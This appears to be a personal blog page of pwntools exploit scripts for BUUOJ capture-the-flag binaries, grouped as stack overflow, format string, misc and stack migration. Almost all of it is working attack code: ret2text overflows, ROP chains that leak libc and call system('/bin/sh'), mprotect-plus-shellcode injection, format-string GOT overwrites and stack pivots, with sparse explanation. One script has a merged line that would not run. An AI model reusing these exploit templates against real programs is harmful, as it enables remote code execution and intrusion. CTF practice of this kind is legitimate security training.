buuoj pwn

This article will record some poc for buuoj pwn .

Stack overflow

rip

attachment

find stackoverflow in main@gets

and find system(“/bin/sh”)

or use cyclic calc overflow size fast

1
2
pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

1
2
3

pwndbg> cyclic -l agaa
23

exp:

1
2
3
4
5
6
7
8
9
10
from pwn import *

#sh=process("./pwn1")
sh=remote("node4.buuoj.cn",26641)
elf=ELF("./pwn1")
fun_addr=0x000000000040118A

payload=b"a"*23+p64(fun_addr)
sh.sendline(payload)
sh.interactive()

warmup_csaw_2016

attachment

exp:

1
2
3
4
5
6
7
8
9
10
from pwn import *

#sh=process("./warmup_csaw_2016")
sh=remote("node4.buuoj.cn",26058)

fun_addr=0x0000000000400611

payload=b"a"*72+p64(fun_addr)
sh.sendline(payload)
sh.interactive()

pwn1_sctf_2016

attachment
this is a c++ elf

in fgets it has’t stackoverflow ,but in function replace is make “I” to “you”,so we can use this module to overflow

1
2
3
4
5
6
7
8
9
10
from pwn import *
context.log_level="debug"

sh=process("./pwn1_sctf_2016")
#print(sh.recv())
success_addr=0x08048F13
payload=b"IIIIIIIIIIIIIIIIIIIIaaaa"+p32(success_addr)
sh.sendline(payload)
print(sh.recv())
sh.interactive()

jarvisoj_level0

attachment

1
2
3
4
5
6
7
from pwn import *
sh=process("./level0")
#sh=remote("node4.buuoj.cn",26346)
success_addr=0x000000000040059A
payload=b"a"*0x80+b"a"*8+p64(success_addr)
sh.sendline(payload)
sh.interactive()

jarvisoj_level2

attachment

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./level2")
#sh=remote("node4.buuoj.cn",26341)
#pwnlib.gdb.attach(sh,'b *0x0804847F')
system_addr=0x08048320
bin_sh_addr=0x0804a024
payload=b"a"*0x88+b"a"*4+p32(system_addr)+b"b"*4+p32(bin_sh_addr)
sh.sendline(payload)
sh.interactive()

ciscn_2019_c_1

attachment

1
2
ROPgadget --binary ciscn_2019_c_1 --only "pop|ret"
0x0000000000400c83 : pop rdi ; ret

remote_exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from pwn import*
from LibcSearcher import *
#context.log_level="debug"
sh=process("./ciscn_2019_c_1")
#sh=remote("node4.buuoj.cn",25090)
elf=ELF("./ciscn_2019_c_1")
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
start_addr=0x0000000000400B28
ret_addr=0x4006b9
#context.terminal=['gnome-terminal','-x','sh','-c']

#pwnlib.gdb.attach(sh,'b *0000000000400AEE')
pop_rdi=0x0000000000400c83

sh.recv()
sh.sendline("1")
sh.recv()

payload=b'\0'*0x58+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(start_addr)
sh.sendline(payload)
sh.recvline()
sh.recvline()
leak_puts_got=u64(sh.recvline()[:-1].ljust(8, b'\x00'))

sh.recv()
sh.sendline("1")
sh.recv()

sh.recv()
libc=LibcSearcher("puts",leak_puts_got)
libcbase=leak_puts_got-libc.dump("puts")
system_addr=libcbase+libc.dump("system")
bin_sh_addr=libcbase+libc.dump("str_bin_sh")


payload=b'\0'*0x58+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
sh.sendline(payload)
sh.interactive()

localexp(ubuntu16):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import*
from LibcSearcher import *
context.log_level="debug"
context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./ciscn_2019_c_1")
#pwnlib.gdb.attach(sh,'b *0x0000000000400AEE')
elf=ELF("./ciscn_2019_c_1")
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
start_addr=0x00000000004009a0
ret_addr=0x4006b9

pop_rdi=0x0000000000400c83

sh.recv()
sh.sendline("1")
sh.recv()


payload=b'\0'*0x58+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(ret_addr)+p64(start_addr)
sh.sendline(payload)

sh.recvline()
sh.recvline()
leak_puts_got=u64(sh.recvline()[:-1].ljust(8, b'\x00'))

sh.recv()
print(hex(leak_puts_got))
system_addr=libc.symbols['system']+leak_puts_got-libc.symbols['puts']
bin_sh_addr=libc.search(b'/bin/sh\x00').__next__()+leak_puts_got-libc.symbols['puts']
print(hex(bin_sh_addr))
payload=b'\0'*0x58+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)

sh.sendline(payload)
sh.interactive()

tips libcsearch: https://libc.rip/

bjdctf_2020_babystack

attachment

exp:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

sh=process("./bjdctf_2020_babystack")
#sh=remote("node4.buuoj.cn",27765)
backdoor=0x00000000004006EA
payload=b'a'*0x10+b'b'*0x8+p64(backdoor)
sh.recv()
sh.sendline("100\n")
sh.recv()
sh.sendline(payload)
sh.interactive()

ogeek2019_babyrop

attachment
libc-2.23.so
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *
context.log_level="debug"
#context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./ogeek2019-babyrop")
#sh=remote("node4.buuoj.cn",29154)
#pwnlib.gdb.attach(sh,'b *0x080487E9')

elf=ELF("./ogeek2019-babyrop")
#libc=ELF("/lib/i386-linux-gnu/libc.so.6")
libc=ELF("./libc-2.23.so")
write_got=elf.got['write']
write_plt=elf.plt['write']
libc_write=libc.symbols['write']
libc_system=libc.symbols['system']
libc_bin_sh=libc.search(b"/bin/sh").__next__()
start_vul=0x080487D0

poc1=b'\x00'+7*b'\xff'
sh.sendline(poc1)
sh.recv()

print(hex(write_plt))
get_write_got_payload=b'a'*0xe7+b'b'*0x4+p32(write_plt)+p32(start_vul)+p32(1)+p32(write_got)+p32(4)
sh.sendline(get_write_got_payload)

write_addr=u32(sh.recv()[0:4])
base_addr=write_addr-libc_write
system_addr=base_addr+libc_system
libc_bin_sh=base_addr+libc_bin_sh

getshell_payload=b'a'*0xe7+b'b'*0x4+p32(system_addr)+p32(start_vul)+p32(libc_bin_sh)
sh.sendline(getshell_payload)


sh.interactive()

get_started_3dsctf_2016

attachment
exp1:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
context.log_level="debug"
getflag_addr=0x080489A0
exit_addr=0x0804E6A0
#context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./get_started_3dsctf_2016")
#sh=remote("node4.buuoj.cn",29230)
#pwnlib.gdb.attach(sh,'b *0x08048A40')

payload=b'a'*0x38+p32(getflag_addr)+p32(exit_addr)+p32(0x308CD64F)+p32(0x195719D1)
sh.sendline(payload)
print(sh.recv())
sh.interactive()

exp2:

1
2
3
4
5
6
int mprotect(const void *start, size_t len, int prot);
param1: operate address
param2: operate leng。
param3: operate change to permission

for example mprotect(0x600000,0x1000,7)

because function read&mprotect both need three params. so we search pop3

1
2
3
4
5
6
7
bkfish@ubuntu:~/Desktop/pwn/tmp$ ROPgadget --binary get_started_3dsctf_2016 --only "pop|ret"
Gadgets information

0x08063adb : pop edi ; pop esi ; pop ebx ; ret
0x080509a5 : pop ebx ; pop esi ; pop edi ; ret
0x0809e4c5 : pop ebp ; pop esi ; pop edi ; ret

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
context.log_level="debug"
mprotect_addr=0x0806EC80
sh=process("./get_started_3dsctf_2016")
read_addr=0x0806E140
pop3_addr=0x08063adb
bss_addr=0x080EB000
#sh=remote("node4.buuoj.cn",29230)
#pwnlib.gdb.attach(sh,'b *0x08048A40')

#change bss permisson
payload=b'a'*0x38+p32(mprotect_addr)+p32(pop3_addr)+p32(bss_addr)+p32(0x1000)+p32(7)

# read
payload+=p32(read_addr)+p32(pop3_addr)+p32(0)+p32(bss_addr)+p32(0x50)+p32(bss_addr)
sh.sendline(payload)
payload2=asm(shellcraft.sh())
sh.sendline(payload2)
sh.interactive()

jarvisoj_level2_x64

attachment

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
bkfish@ubuntu:~/Desktop/pwn/tmp$ ROPgadget --binary level2_x64 --only "pop|ret"
Gadgets information
============================================================
0x00000000004006ac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006ae : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006b0 : pop r14 ; pop r15 ; ret
0x00000000004006b2 : pop r15 ; ret
0x00000000004006ab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006af : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400560 : pop rbp ; ret
0x00000000004006b3 : pop rdi ; ret
0x00000000004006b1 : pop rsi ; pop r15 ; ret
0x00000000004006ad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004a1 : ret

Unique gadgets found: 11

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
context.log_level="debug"
#sh=process("./level2_x64")
sh=remote("node4.buuoj.cn",29018)
elf=ELF("./level2_x64")
pop_rdi=0x00000000004006b3
bin_sh=0x0000000000600a90
system_addr=0x00000000004004C0
ret_addr = 0x00000000004004a1
system_addr1=elf.plt['system']
print(hex(system_addr1))
sh.recv()
payload=b'a'*0x80+b'a'*0x8+p64(pop_rdi)+p64(bin_sh)+p64(ret_addr)+p64(system_addr1)
sh.sendline(payload)
sh.interactive()

HarekazeCTF2019_babyrop

attachment

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

sh=process("./HarekazeCTF2019_babyrop")
#sh=remote("node4.buuoj.cn",27421)
bin_sh=0x0000000000601048
system_addr=0x0000000000400490
pop_rdi=0x0000000000400683
ret=0x0000000000400479
payload=b'a'*0x10+b'b'*0x8+p64(pop_rdi)+p64(bin_sh)+p64(ret)+p64(system_addr)
sh.sendline(payload)
sh.interactive()

not_the_same_3dsctf_2016

attachment
exp1:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context.log_level="debug"
getflag=0x080489A0
flag_addr=0x080ECA2D
write_addr=0x0806E270
context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./not_the_same_3dsctf_2016")
#pwnlib.gdb.attach(sh,'b *0x080489DE')
payload=b'a'*0x2D+p32(getflag)+p32(write_addr)+p32(0)+p32(1)+p32(flag_addr)+p32(50)
sh.sendline(payload)
sh.interactive()

exp2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
import time
#context.log_level="debug"
pop3_addr=0x0806fcf0
mprotect_addr=0x0806ED40
context.terminal=['gnome-terminal','-x','sh','-c']
read_addr=0x0806E200
start_bss=0x80eb000
sh=process("./not_the_same_3dsctf_2016")
#pwnlib.gdb.attach(sh,'b *0x08048A00')


payload2=asm(shellcraft.sh())


#mprotect
payload=b'a'*0x2D+p32(mprotect_addr)+p32(pop3_addr)+p32(start_bss)+p32(0x1000)+p32(7)


#read bss
payload+=p32(read_addr)+p32(pop3_addr)+p32(0)+p32(start_bss)+p32(len(payload2))+p32(start_bss)
sh.sendline(payload)

time.sleep(1)

sh.sendline(payload2)
sh.interactive()

ciscn_2019_n_5

attachment
exp1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

context.log_level="debug"
context.terminal=['gnome-terminal','-x','sh','-c']
elf=ELF("./ciscn_2019_n_5")
context.arch = "amd64"
context.os = "linux"
shellcode=asm(shellcraft.sh())bss_addr=0x0000000000601080
sh=process("./ciscn_2019_n_5")
#sh=remote("node4.buuoj.cn",27285)
pwnlib.gdb.attach(sh,'b *0x00000000004006AA')
sh.recv()
sh.sendline(shellcode)
sh.recv()


payload=b'a'*0x20+b'c'*0x8+p64(bss_addr)
sh.sendline(payload)
sh.interactive()

exp2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
from LibcSearcher import *
context.log_level='debug'

p = process('./ciscn_2019_n_5')
#p = remote('node4.buuoj.cn', 26628)
elf = ELF('./ciscn_2019_n_5')

ret = 0x00000000004004c9
rdi = 0x0000000000400713

p.sendlineafter(b'tell me your name\n', 'w1nd')
payload = b'a'*0x28 + p64(rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
p.sendlineafter(b'What do you want to say to me?\n', payload)

puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase = puts_addr - libc.sym['puts']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh\x00'))

p.sendlineafter(b'tell me your name\n', 'hello')
payload = b'a'*0x28 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
p.sendlineafter(b'What do you want to say to me?\n', payload)

p.interactive()

ciscn_2019_ne_5

attachment

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
elf=ELF("./ciscn_2019_ne_5")
#print(hex(elf.search(b'sh').__next__()))

sh_addr=0x80482ea

system_addr=0x080484D0


payload=b'a'*0x48+b'b'*0x4+p32(system_addr)+p32(0x080486C7)+p32(0x80482ea)

#sh=process("./ciscn_2019_ne_5")
sh=remote("node4.buuoj.cn",26512)
sh.recv()
sh.sendline("administrator")
sh.recv()
sh.sendline("1")
sh.recv()
sh.sendline(payload)
sh.recv()
sh.sendline("4")
sh.interactive()

trsx_2018_rop

attachment
remote

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import *
from LibcSearcher import *

elf=ELF("./trsx_2018_rop")
vul_start_addr=0x08048474
write_got=elf.got['write']
write_plt=elf.plt['write']

context.terminal=['gnome-terminal','-x','sh','-c']
#sh=process("./trsx_2018_rop")
sh=remote("node4.buuoj.cn",27410)
#pwnlib.gdb.attach(sh,'b *0x0804849C')

pop3_addr=0x0804855d
payload=b'a'*0x88+b'b'*0x4+p32(write_plt)+p32(pop3_addr)+p32(1)+p32(write_got)+p32(0x4)+p32(vul_start_addr)

sh.sendline(payload)
write_leak_addr=u32(sh.recv())

print(hex(write_leak_addr))

libc=LibcSearcher("write",write_leak_addr)
libcbase=write_leak_addr-libc.dump("write")
system_addr=libcbase+libc.dump("system")
bin_sh_addr=libcbase+libc.dump("str_bin_sh")

print(hex(bin_sh_addr))
payload=b'a'*0x88+b'b'*0x4+p32(system_addr)+p32(0)+p32(bin_sh_addr)
sh.sendline(payload)
sh.interactive()

local

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from pwn import *

elf=ELF("./trsx_2018_rop")
vul_start_addr=0x08048474
write_got=elf.got['write']
write_plt=elf.plt['write']

context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./trsx_2018_rop")
#sh=remote("node4.buuoj.cn",27410)
#pwnlib.gdb.attach(sh,'b *0x0804849C')

pop3_addr=0x0804855d
payload=b'a'*0x88+b'b'*0x4+p32(write_plt)+p32(pop3_addr)+p32(1)+p32(write_got)+p32(0x4)+p32(vul_start_addr)

sh.sendline(payload)
write_leak_addr=u32(sh.recv())

print(hex(write_leak_addr))

libc=ELF("/lib/i386-linux-gnu/libc.so.6")
libcbase=write_leak_addr-libc.symbols["write"]
system_addr=libcbase+libc.symbols["system"]
bin_sh_addr=libcbase+libc.search(b"/bin/sh").__next__()

print(hex(bin_sh_addr))
payload=b'a'*0x88+b'b'*0x4+p32(system_addr)+p32(0)+p32(bin_sh_addr)
sh.sendline(payload)
sh.interactive()

bjdctf_2020_babyrop

attachment

remote

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from pwn import *
from LibcSearcher import *
context.log_level="debug"

elf=ELF("./bjdctf_2020_babyrop")
pop_rdi=0x0000000000400733
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']

vul_start_addr=0x000000000040067D

#sh=process("./bjdctf_2020_babyrop")
sh=remote("node4.buuoj.cn",25147)
sh.recv()
payload=b'a'*0x20+b'b'*0x8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vul_start_addr)

sh.sendline(payload)

leak_puts_got=u64(sh.recv().split(b"\n")[0].ljust(8, b'\x00'))

libc=LibcSearcher("puts",leak_puts_got)
libcbase=leak_puts_got-libc.dump("puts")
system_addr=libcbase+libc.dump("system")
bin_sh_addr=libcbase+libc.dump("str_bin_sh")

payload=b'a'*0x20+b'b'*0x8+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
sh.sendline(payload)

sh.interactive()

local

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
from LibcSearcher import *
context.log_level="debug"

elf=ELF("./bjdctf_2020_babyrop")
pop_rdi=0x0000000000400733
ret_addr=0x00000000004004c9

puts_got=elf.got['puts']
puts_plt=elf.plt['puts']

vul_start_addr=0x000000000040067D

sh=process("./bjdctf_2020_babyrop")
#sh=remote("node4.buuoj.cn",25147)
sh.recv()
payload=b'a'*0x20+b'b'*0x8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vul_start_addr)

sh.sendline(payload)

leak_puts_got=u64(sh.recv().split(b"\n")[0].ljust(8, b'\x00'))

libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libcbase=leak_puts_got-libc.symbols["puts"]
system_addr=libcbase+libc.symbols["system"]
bin_sh_addr=libcbase+libc.search(b"/bin/sh").__next__()

print(hex(bin_sh_addr))
payload=b'a'*0x20+b'b'*0x8+p64(pop_rdi)+p64(bin_sh_addr)+p64(ret_addr)+p64(system_addr)
sh.sendline(payload)

sh.interactive()

bjdctf_2020_babystack2

attachment

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

context.log_level="debug"
backdoor_addr=0x0000000000400726
red_addr=0x0000000000400599
context.terminal=['gnome-terminal','-x','sh','-c']
#sh=process("./bjdctf_2020_babystack2")
sh=remote("node4.buuoj.cn",26535)
#pwnlib.gdb.attach(sh,'b *0x0000000000400827')

sh.recv()
sh.sendline("-1")
sh.recv()
#payload=b'a'*0x10+b'b'*0x8+p64(red_addr)+p64(backdoor_addr)
payload=b'a'*0x10+b'b'*0x8+p64(backdoor_addr)
sh.sendline(payload)
sh.interactive()

pwn2_sctf_2016

attachment

local

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from pwn import *
from LibcSearcher import *
context.terminal=['gnome-terminal','-x','sh','-c']
context.log_level="debug"
sh=process("./pwn2_sctf_2016")
#sh=remote("node4.buuoj.cn",29146)


#pwnlib.gdb.attach(sh,'b *0x080485B7')
elf=ELF("./pwn2_sctf_2016")
printf_got=elf.got['printf']
printf_plt=elf.plt['printf']
vuladdr=0x0804852F

sh.recv()
sh.sendline("-1")
sh.recv()
payload=b'a'*0x2c+b'b'*0x4+p32(printf_plt)+p32(vuladdr)+p32(printf_got)

sh.sendline(payload)
sh.recvuntil("\n")

printf_addr=u32(sh.recv()[0:4])

print(hex(printf_addr))

libc=ELF("/lib/i386-linux-gnu/libc.so.6")
libcbase=printf_addr-libc.symbols["printf"]
system_addr=libcbase+libc.symbols["system"]
bin_sh_addr=libcbase+libc.search(b"/bin/sh").__next__()

#print("binbash")
#print(hex(bin_sh_addr))
sh.sendline("-1")
sh.recv()

payload=b'a'*0x2c+b'b'*0x4+p32(system_addr)+p32(vuladdr)+p32(bin_sh_addr)
sh.sendline(payload)
sh.interactive()

remote

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
from LibcSearcher import *
#sh=process("./pwn2_sctf_2016")
sh=remote("node4.buuoj.cn",29146)
elf=ELF("./pwn2_sctf_2016")
printf_got=elf.got['printf']
printf_plt=elf.plt['printf']
vuladdr=0x0804852F

sh.recv()
sh.sendline("-1")
sh.recv()
payload=b'a'*0x2c+b'b'*0x4+p32(printf_plt)+p32(vuladdr)+p32(printf_got)

sh.sendline(payload)
sh.recvuntil("\n")

printf_addr=u32(sh.recv()[0:4])

print(hex(printf_addr))

libc=LibcSearcher("printf",printf_addr)
libc_base=printf_addr-libc.dump("printf")

system_addr=libc_base+libc.dump("system")
bin_sh=libc_base+libc.dump("str_bin_sh")
#sh.recv()

sh.sendline("-1")
sh.recv()

payload=b'a'*0x2c+b'b'*0x4+p32(system_addr)+p32(vuladdr)+p32(bin_sh)
sh.sendline(payload)
sh.interactive()

jarvisoj_tell_me_something

attachment

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context.log_level="debug"
getflag_addr=0x0000000000400620
rdi_addr=0x00000000004006f3
sh=process("./jarvisoj_tell_me_something")
#sh=remote("node4.buuoj.cn",27880)
payload=b'a'*0x88+p64(getflag_addr)
sh.recv()
sh.sendline(payload)
print(sh.recv())
sh.interactive()

HarekazeCTF2019_baby_rop2

attachment

rop use __start rather than main
remote

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *
from LibcSearcher import *

context.log_level="debug"
context.terminal=['gnome-terminal','-x','sh','-c']


#sh=process("./HarekazeCTF2019_baby_rop2")
sh=remote("node4.buuoj.cn",26905)
elf=ELF("./HarekazeCTF2019_baby_rop2")


#pwnlib.gdb.attach(sh,'b *0x00000000004006CA')

s_fromat=0x0000000000400790
printf_plt=elf.plt['printf']
read_got=elf.got['read']
rdi_pop=0x0000000000400733
start_addr=0x0000000000400540
rsi_r15_ret=0x0000000000400731

sh.recv()
payload=b'a'*0x28+p64(rdi_pop)+p64(s_fromat)+p64(rsi_r15_ret)+p64(read_got)+p64(0)+p64(printf_plt)+p64(start_addr)
sh.sendline(payload)
sh.recvuntil("!\n")

read_addr=u64(sh.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
print(hex(read_addr))

libc=LibcSearcher("read",read_addr)
libcbase=read_addr-libc.dump("read")
system_addr=libcbase+libc.dump("system")
bin_sh_addr=libcbase+libc.dump("str_bin_sh")
print(hex(system_addr))
print(hex(bin_sh_addr))

payload2=b'a'*0x28+p64(rdi_pop)+p64(bin_sh_addr)+p64(system_addr)+p64(start_addr)
sh.recv()
sh.sendline(payload2)
sh.interactive()

local

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
from LibcSearcher import *

context.log_level="debug"
context.terminal=['gnome-terminal','-x','sh','-c']


sh=process("./HarekazeCTF2019_baby_rop2")
#sh=remote("node4.buuoj.cn",26432)
elf=ELF("./HarekazeCTF2019_baby_rop2")


#pwnlib.gdb.attach(sh,'b *0x00000000004006CB')

s_fromat=0x0000000000400790
printf_plt=elf.plt['printf']
read_got=elf.got['read']
rdi_pop=0x0000000000400733
start_addr=0x0000000000400540
rsi_r15_ret=0x0000000000400731
ret=0x00000000004004d1

sh.recv()
payload=b'a'*0x28+p64(rdi_pop)+p64(s_fromat)+p64(rsi_r15_ret)+p64(read_got)+p64(0)+p64(printf_plt)+p64(start_addr)
sh.sendline(payload)
sh.recvuntil("!\n")

read_addr=u64(sh.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
print(hex(read_addr))

libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libcbase=read_addr-libc.symbols["read"]
system_addr=libcbase+libc.symbols["system"]
bin_sh_addr=libcbase+next(libc.search(b"/bin/sh"))
print(hex(system_addr))
print(hex(bin_sh_addr))

payload2=b'M'*0x28+p64(rdi_pop)+p64(bin_sh_addr)+p64(ret)+p64(system_addr)

sh.sendline(payload2)
print(sh.recv())
sh.interactive()

jarvisoj_level3

jarvisoj_level3
attachment
remote

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *
from LibcSearcher import *
context.log_level="debug"
context.terminal=['gnome-terminal','-x','sh','-c']
#sh=process("./jarvisoj_level3")
sh=remote("node4.buuoj.cn",26537)

#pwnlib.gdb.attach(sh,'b *0x0804844B')


elf=ELF("./jarvisoj_level3")

sh.recv()
write_got=elf.got['write']
write_plt=elf.plt['write']
start_vul=0x0804844B
pop3_ret=0x08048519

payload=b'A'*0x88+b'bbbb'+p32(write_plt)+p32(pop3_ret)+p32(1)+p32(write_got)+p32(0x4)+p32(start_vul)
sh.sendline(payload)
write_addr=u32(sh.recv(4))
print(hex(write_addr))
sh.recv()


libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
system_addr=libc_base+libc.dump("system")
bin_sh_addr=libc_base+libc.dump("str_bin_sh")


payload=b'A'*0x88+b'bbbb'+p32(system_addr)+p32(0)+p32(bin_sh_addr)
sh.sendline(payload)
sh.interactive()

local

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
from LibcSearcher import *
context.log_level="debug"
context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./jarvisoj_level3")
#sh=remote("node4.buuoj.cn",26537)

#pwnlib.gdb.attach(sh,'b *0x0804844B')


elf=ELF("./jarvisoj_level3")

sh.recv()
write_got=elf.got['write']
write_plt=elf.plt['write']
start_vul=0x0804844B
pop3_ret=0x08048519

payload=b'A'*0x88+b'bbbb'+p32(write_plt)+p32(pop3_ret)+p32(1)+p32(write_got)+p32(0x4)+p32(start_vul)
sh.sendline(payload)
write_addr=u32(sh.recv(4))
print(hex(write_addr))
sh.recv()


libc=ELF("/lib/i386-linux-gnu/libc.so.6")
libc_base=write_addr-libc.symbols["write"]
system_addr=libc_base+libc.symbols["system"]
bin_sh_addr=libc_base+libc.search(b"/bin/sh").__next__()


payload=b'A'*0x88+b'bbbb'+p32(system_addr)+p32(0)+p32(bin_sh_addr)
sh.sendline(payload)
sh.interactive()

Fmt

2019_dwkj_pwn1

attachment

exp1:

1
2
3
4
5
6
7
8
9
from pwn import *
#context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./2019_dwkj_pwn1")
#pwnlib.gdb.attach(sh,'b *0x080492BC')
payload=p32(0x804c044)+b"%10$n"
sh.sendline(payload)
sh.recv()
print(sh.sendline("4"))
sh.interactive()

exp2:

1
2
3
4
5
6
7
8
9
from pwn import *

sh=process("./2019_dwkj_pwn1")
bss_addr=0x0804C044
payload=fmtstr_payload(10,{bss_addr:0x1111})
sh.sendline(payload)
sh.recv()
print(sh.sendline(str(0x1111)))
sh.interactive()

exp3:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

sh=process("./2019_dwkj_pwn1")
#sh=remote("node4.buuoj.cn",25037)
elf=ELF("./2019_dwkj_pwn1")
atoi_got=elf.got['atoi']
system_plt=elf.plt['system']

payload=fmtstr_payload(10,{atoi_got:system_plt})
sh.sendline(payload)
sh.recv()
print(sh.sendline("/bin/sh"))
sh.interactive()

jarvisoj_fm

attachment

1
2
3
4
5
6
7
8
from pwn import *
x_addr=0x0804A02C

payload=b"%4c%13$n"+p32(x_addr)
sh=process("./jarvisoj_fm")
#sh=remote("node4.buuoj.cn",25910)
sh.sendline(payload)
sh.interactive()

or

1
2
3
4
5
6
7
from pwn import *
x_addr=0x0804A02C

payload=fmtstr_payload(11,{x_addr:0x4})
sh=process("./jarvisoj_fm")
sh.sendline(payload)
sh.interactive()

Misc

ciscn_2019_n_1

attachment

exp1:

1
2
3
4
5
6
7
from pwn import *
want_v1=0x41348000
#sh=process("./ciscn_2019_n_1")
sh=remote("node4.buuoj.cn",26268)
payload=b"a"*(0x30-0x4)+p64(want_v1)
sh.sendline(payload)
sh.interactive()

ciscn_2019_n_8

attachment

1
2
3
4
5
6
7
8
from pwn import *
context.log_level="debug"
#context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./ciscn_2019_n_8")
#pwnlib.gdb.attach(sh,'b main')
payload=p32(17)*14
sh.sendline(payload)
sh.interactive()

Stack Migration

ciscn_2019_es_2

attachment

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
system_plt=0x08048400
context.log_level="debug"
context.terminal=['gnome-terminal','-x','sh','-c']
sh=process("./ciscn_2019_es_2")
#sh=remote("node4.buuoj.cn",26409)
#pwnlib.gdb.attach(sh,'b *0x080485FE')
sh.recv()

payload=b'a'*0x27
sh.sendline(payload)
sh.recvuntil("\n")
old_ebp=u32(sh.recv()[:4])
print(hex(old_ebp))

leave_ret=0x080484b8
ebp_base=old_ebp-0x38


payload2=b'a'*4+p32(system_plt)+b'dddd'+p32(ebp_base+0x10)+b'/bin/sh\x00'
payload2=payload2.ljust(0x28,b'p')
payload2+=p32(ebp_base)+p32(leave_ret)

print(payload2)
sh.sendline(payload2)
sh.interactive()